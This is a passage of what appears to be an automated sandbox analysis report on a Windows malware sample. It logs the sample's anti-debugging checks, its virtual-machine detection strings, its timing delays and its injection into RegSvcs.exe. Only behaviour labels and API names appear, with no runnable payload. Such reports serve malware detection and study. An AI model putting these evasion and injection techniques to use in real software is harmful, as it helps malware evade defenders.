                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593969Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593641Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593531Jump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2028Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7829Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2381Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7454Jump to behavior
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-99295
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeAPI coverage: 4.5 %
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeAPI coverage: 4.6 %
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeAPI coverage: 4.4 %
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E34696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00E34696
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E3C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00E3C9C7
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E3C93C FindFirstFileW,FindClose,0_2_00E3C93C
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E3F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E3F200
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E3F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E3F35D
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E3F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E3F65E
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E33A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E33A2B
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E33D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E33D4E
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E3BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E3BF27
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CB4696 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00CB4696
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CBC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_00CBC9C7
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CBC93C FindFirstFileW,FindClose,2_2_00CBC93C
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CBF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00CBF200
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CBF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00CBF35D
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CBF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00CBF65E
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CB3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00CB3A2B
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CB3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00CB3D4E
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CBBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00CBBF27
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CB4696 GetFileAttributesW,FindFirstFileW,FindClose,5_2_00CB4696
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CBC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_00CBC9C7
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CBC93C FindFirstFileW,FindClose,5_2_00CBC93C
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CBF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00CBF200
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CBF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00CBF35D
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CBF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00CBF65E
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CB3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00CB3A2B
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CB3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00CB3D4E
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CBBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00CBBF27
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DD4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00DD4AFE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599844Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599734Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599624Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599515Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599398Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599252Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599125Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598889Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598343Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598124Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598015Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597906Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597796Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597468Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597359Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597249Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597140Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597031Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596921Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596790Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596560Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596324Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596217Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595874Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594999Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599331Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598982Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598297Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598092Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597953Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597540Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597219Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596563Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596219Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595115Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594975Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594641Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594422Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593969Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593641Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593531Jump to behavior
                    Source: RegSvcs.exe, 00000006.00000002.4511232795.0000000002B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                    Source: RegSvcs.exe, 00000006.00000002.4511232795.0000000002B41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: outvaunts.exe, 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2184485388.0000000000402000.00000040.80000000.00040000.00000000.sdmp, outvaunts.exe, 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: hgfsZrw6
                    Source: RegSvcs.exe, 00000003.00000002.2190299028.0000000005C6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
                    Source: outvaunts.exe, 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                    Source: RegSvcs.exe, 00000006.00000002.4514346303.0000000005EC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeAPI call chain: ExitProcess graph end nodegraph_0-98221
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeAPI call chain: ExitProcess graph end node

                    Anti Debugging

                    barindex
                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00A97070 CheckRemoteDebuggerPresent,3_2_00A97070
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E441FD BlockInput,0_2_00E441FD
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DD3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00DD3B4C
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E05CCC RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,0_2_00E05CCC
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00EE8070 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00EE8070
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_011561A8 mov eax, dword ptr fs:[00000030h]0_2_011561A8
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_01156208 mov eax, dword ptr fs:[00000030h]0_2_01156208
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_01154B18 mov eax, dword ptr fs:[00000030h]0_2_01154B18
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_01112168 mov eax, dword ptr fs:[00000030h]2_2_01112168
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_011121C8 mov eax, dword ptr fs:[00000030h]2_2_011121C8
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_01110AD8 mov eax, dword ptr fs:[00000030h]2_2_01110AD8
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_017CF3E0 mov eax, dword ptr fs:[00000030h]5_2_017CF3E0
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_017CF380 mov eax, dword ptr fs:[00000030h]5_2_017CF380
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_017CDCF0 mov eax, dword ptr fs:[00000030h]5_2_017CDCF0
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E281F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00E281F7
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DFA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00DFA395
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DFA364 SetUnhandledExceptionFilter,0_2_00DFA364
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C7A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00C7A395
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C7A364 SetUnhandledExceptionFilter,2_2_00C7A364
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C7A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00C7A395
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C7A364 SetUnhandledExceptionFilter,5_2_00C7A364
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 6EF008Jump to behavior
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 8F3008Jump to behavior
